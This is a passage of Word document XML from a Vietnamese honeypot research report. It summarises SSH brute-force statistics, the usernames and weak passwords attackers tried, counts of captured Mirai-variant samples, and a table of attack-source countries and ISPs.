        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Số lần tấn công dò quét brute-force: 1.420 đợt (chiếm 52% tổng số sự kiện).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Tên đăng nhập được nhắm mục tiêu nhiều nhất: 'root' (78%), 'admin' (11%), 'user' (4%), 'ubuntu' (3%), 'test' (2%).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Mật khẩu phổ biến nhất bị hacker thử nghiệm: '123456', 'password', 'admin', 'root', '12345678', 'qwerty'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Số lượng mã độc tải lên được bẫy ghi lại: 23 mẫu nhị phân ELF và tập lệnh bash (trong đó 19 mẫu là biến thể của Mirai botnet).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="2926080"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="mitre_distribution.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2926080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 5.3: Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 5.2: Top các Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Quốc gia Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Số Lượng IP Độc Hại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tỷ lệ %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Nhà Mạng / Đơn vị Chủ Quản (ISP Chính)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trung Quốc (CN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>142 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>34.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>China Telecom, Alibaba Cloud, Tencent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hoa Kỳ (US)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>86 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>20.6%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DigitalOcean, Amazon Web Services, Linode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nga (RU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>48 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>11.5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hostkey, Rostelecom, Petersburg Internet Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hà Lan (NL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>32 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.7%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Serverius Holding, EUNetworks, Tor Exit Nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Việt Nam (VN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>26 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6.2%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Viettel, VNPT, FPT Telecom (Máy tính người dùng bị nhiễm botnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ấn Độ (IN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BSNL, Bharti Airtel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Brazil (BR)</w:t>
            </w:r>
